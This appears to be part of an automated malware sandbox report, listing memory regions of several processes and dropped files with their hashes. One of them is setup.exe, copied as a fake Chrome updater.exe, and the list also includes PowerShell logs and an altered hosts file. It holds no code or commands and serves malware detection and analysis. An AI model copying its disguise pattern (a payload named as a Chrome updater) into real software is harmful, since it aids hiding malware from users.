memory/4476-140-0x00000000061D0000-0x0000000006774000-memory.dmp

memory/4476-141-0x0000000006880000-0x0000000006E98000-memory.dmp

memory/4476-142-0x0000000006EA0000-0x0000000006FAA000-memory.dmp

memory/4476-144-0x0000000006130000-0x0000000006142000-memory.dmp

memory/4476-143-0x0000000001B70000-0x0000000001B99000-memory.dmp

memory/4476-145-0x00000000061C0000-0x00000000061D0000-memory.dmp

memory/4476-146-0x0000000006150000-0x000000000618C000-memory.dmp

memory/4476-147-0x0000000003670000-0x00000000036AF000-memory.dmp

memory/4476-148-0x0000000074F50000-0x0000000075700000-memory.dmp

memory/4476-149-0x00000000061C0000-0x00000000061D0000-memory.dmp

memory/4476-151-0x00000000061C0000-0x00000000061D0000-memory.dmp

memory/4476-152-0x0000000007140000-0x00000000071B6000-memory.dmp

memory/4476-153-0x00000000071C0000-0x0000000007252000-memory.dmp

memory/4476-154-0x0000000007360000-0x00000000073C6000-memory.dmp

memory/4476-155-0x0000000007BD0000-0x0000000007C20000-memory.dmp

memory/4476-156-0x00000000061C0000-0x00000000061D0000-memory.dmp

memory/4476-157-0x0000000008D10000-0x0000000008ED2000-memory.dmp

memory/4476-158-0x0000000008EE0000-0x000000000940C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\mi.exe

MD5 80b0b41decb53a01e8c87def18400267
SHA1 885f327c4e91065486137ca96105190f7a29d0f9
SHA256 10d8e7a04d05a2690a7e0cc30c10028eda0af680a8787f24cb9668ccbe46e1e1
SHA512 19bd6c9ab0cfbba34e722f508fcb4a99ae78a0d71ef664b186034c78eda09a61ae63455f7958dd5a50ec6432c822b23582ca7c87309a37fcbbb28e5facf56c8e

C:\Users\Admin\AppData\Local\Temp\mi.exe

MD5 80b0b41decb53a01e8c87def18400267
SHA1 885f327c4e91065486137ca96105190f7a29d0f9
SHA256 10d8e7a04d05a2690a7e0cc30c10028eda0af680a8787f24cb9668ccbe46e1e1
SHA512 19bd6c9ab0cfbba34e722f508fcb4a99ae78a0d71ef664b186034c78eda09a61ae63455f7958dd5a50ec6432c822b23582ca7c87309a37fcbbb28e5facf56c8e

C:\Users\Admin\AppData\Local\Temp\mi.exe

MD5 80b0b41decb53a01e8c87def18400267
SHA1 885f327c4e91065486137ca96105190f7a29d0f9
SHA256 10d8e7a04d05a2690a7e0cc30c10028eda0af680a8787f24cb9668ccbe46e1e1
SHA512 19bd6c9ab0cfbba34e722f508fcb4a99ae78a0d71ef664b186034c78eda09a61ae63455f7958dd5a50ec6432c822b23582ca7c87309a37fcbbb28e5facf56c8e

C:\Windows\Temp\setup.exe

MD5 84741bc02d2e9226a943aa03b6a4568d
SHA1 617d01316011faf77fba30d49ae1e86ff988380a
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA512 1c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379

C:\Windows\Temp\setup.exe

MD5 84741bc02d2e9226a943aa03b6a4568d
SHA1 617d01316011faf77fba30d49ae1e86ff988380a
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA512 1c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379

C:\Windows\Temp\setup.exe

MD5 84741bc02d2e9226a943aa03b6a4568d
SHA1 617d01316011faf77fba30d49ae1e86ff988380a
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA512 1c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379

memory/1772-181-0x00007FF694210000-0x00007FF695436000-memory.dmp

memory/1772-182-0x00007FF8615D0000-0x00007FF8617C5000-memory.dmp

memory/1772-183-0x00007FF694210000-0x00007FF695436000-memory.dmp

memory/1772-184-0x00007FF694210000-0x00007FF695436000-memory.dmp

memory/1772-185-0x00007FF694210000-0x00007FF695436000-memory.dmp

memory/1772-186-0x00007FF694210000-0x00007FF695436000-memory.dmp

memory/1772-187-0x00007FF694210000-0x00007FF695436000-memory.dmp

memory/1772-188-0x00007FF694210000-0x00007FF695436000-memory.dmp

memory/4476-189-0x0000000000400000-0x00000000018CD000-memory.dmp

memory/4476-190-0x0000000074F50000-0x0000000075700000-memory.dmp

memory/1772-191-0x00007FF694210000-0x00007FF695436000-memory.dmp

memory/1772-193-0x00007FF8615D0000-0x00007FF8617C5000-memory.dmp

memory/2952-199-0x000001CA9A370000-0x000001CA9A392000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_e4fj3mg0.2fu.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2952-204-0x00007FF842A30000-0x00007FF8434F1000-memory.dmp

memory/2952-205-0x000001CA9A3E0000-0x000001CA9A3F0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

memory/60-211-0x00007FF842B50000-0x00007FF843611000-memory.dmp

memory/60-213-0x000001ADB0300000-0x000001ADB0310000-memory.dmp

memory/60-212-0x000001ADB0300000-0x000001ADB0310000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d28a889fd956d5cb3accfbaf1143eb6f
SHA1 157ba54b365341f8ff06707d996b3635da8446f7
SHA256 21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45
SHA512 0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

memory/2952-208-0x00007FF842A30000-0x00007FF8434F1000-memory.dmp

memory/1772-224-0x00007FF694210000-0x00007FF695436000-memory.dmp

memory/60-225-0x000001ADB0300000-0x000001ADB0310000-memory.dmp

memory/60-227-0x00007FF842B50000-0x00007FF843611000-memory.dmp

memory/1772-229-0x00007FF694210000-0x00007FF695436000-memory.dmp

memory/1772-230-0x00007FF8615D0000-0x00007FF8617C5000-memory.dmp

C:\Program Files\Google\Chrome\updater.exe

MD5 84741bc02d2e9226a943aa03b6a4568d
SHA1 617d01316011faf77fba30d49ae1e86ff988380a
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA512 1c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379

memory/3940-232-0x00007FF638E30000-0x00007FF63A056000-memory.dmp

memory/3940-234-0x00007FF8615D0000-0x00007FF8617C5000-memory.dmp

memory/3940-233-0x00007FF638E30000-0x00007FF63A056000-memory.dmp

memory/3940-235-0x00007FF638E30000-0x00007FF63A056000-memory.dmp

memory/3940-236-0x00007FF638E30000-0x00007FF63A056000-memory.dmp

memory/3940-237-0x00007FF638E30000-0x00007FF63A056000-memory.dmp

memory/3940-238-0x00007FF638E30000-0x00007FF63A056000-memory.dmp

memory/3940-239-0x00007FF638E30000-0x00007FF63A056000-memory.dmp

memory/3940-240-0x00007FF638E30000-0x00007FF63A056000-memory.dmp

memory/3940-241-0x00007FF8615D0000-0x00007FF8617C5000-memory.dmp

memory/3228-242-0x00007FF842B50000-0x00007FF843611000-memory.dmp

memory/3228-253-0x000001B8F8C10000-0x000001B8F8C20000-memory.dmp

memory/3228-249-0x000001B8F8C10000-0x000001B8F8C20000-memory.dmp

memory/3228-254-0x00007FF4EFF20000-0x00007FF4EFF30000-memory.dmp

memory/3228-264-0x000001B8FB030000-0x000001B8FB04C000-memory.dmp

memory/3228-265-0x000001B8FB110000-0x000001B8FB11A000-memory.dmp

memory/3228-266-0x000001B8FB280000-0x000001B8FB29C000-memory.dmp

memory/3228-268-0x000001B8FB260000-0x000001B8FB26A000-memory.dmp

memory/3940-267-0x00007FF638E30000-0x00007FF63A056000-memory.dmp

memory/3228-269-0x000001B8FB2C0000-0x000001B8FB2DA000-memory.dmp

memory/3228-271-0x000001B8FB2A0000-0x000001B8FB2A6000-memory.dmp

memory/3228-272-0x000001B8FB2B0000-0x000001B8FB2BA000-memory.dmp

memory/3228-270-0x000001B8FB270000-0x000001B8FB278000-memory.dmp

memory/3228-273-0x000001B8F8C10000-0x000001B8F8C20000-memory.dmp

C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 bdb25c22d14ec917e30faf353826c5de
SHA1 6c2feb9cea9237bc28842ebf2fea68b3bd7ad190
SHA256 e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495
SHA512 b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c

memory/2816-280-0x00007FF842B50000-0x00007FF843611000-memory.dmp

memory/2816-281-0x000001F782E40000-0x000001F782E50000-memory.dmp

C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 b42c70c1dbf0d1d477ec86902db9e986
SHA1 1d1c0a670748b3d10bee8272e5d67a4fabefd31f
SHA256 8ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a
SHA512 57fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5

C:\Windows\System32\drivers\etc\hosts

MD5 2d29fd3ae57f422e2b2121141dc82253
SHA1 c2464c857779c0ab4f5e766f5028fcc651a6c6b7
SHA256 80a60d7ec533d820de20bcedeb41319e7b1def548b6ea73ddbd69455bac4e7a4
SHA512 077a5c554663be7b71f181d961f5c98c732bc296dc015ffee30768a648bee3aad62c39c352cf2947432be19519906aeac7dfaf2557d309bb460732abb7fdbc68

memory/3228-276-0x00007FF842B50000-0x00007FF843611000-memory.dmp

memory/2816-301-0x000001F782E40000-0x000001F782E50000-memory.dmp

memory/2816-303-0x00007FF842B50000-0x00007FF843611000-memory.dmp

C:\Program Files\Google\Chrome\updater.exe

MD5 84741bc02d2e9226a943aa03b6a4568d
SHA1 617d01316011faf77fba30d49ae1e86ff988380a
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA512 1c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379

memory/4816-309-0x0000000001190000-0x00000000011B0000-memory.dmp

memory/3940-308-0x00007FF638E30000-0x00007FF63A056000-memory.dmp

memory/3940-310-0x00007FF8615D0000-0x00007FF8617C5000-memory.dmp

memory/832-311-0x00007FF7C43F0000-0x00007FF7C441A000-memory.dmp

memory/4816-312-0x00007FF6263C0000-0x00007FF626BAF000-memory.dmp

memory/4816-314-0x00007FF6263C0000-0x00007FF626BAF000-memory.dmp

memory/4816-316-0x00007FF6263C0000-0x00007FF626BAF000-memory.dmp

memory/832-315-0x00007FF7C43F0000-0x00007FF7C441A000-memory.dmp

memory/4816-318-0x00007FF6263C0000-0x00007FF626BAF000-memory.dmp

memory/4816-320-0x00007FF6263C0000-0x00007FF626BAF000-memory.dmp

memory/4816-322-0x00007FF6263C0000-0x00007FF626BAF000-memory.dmp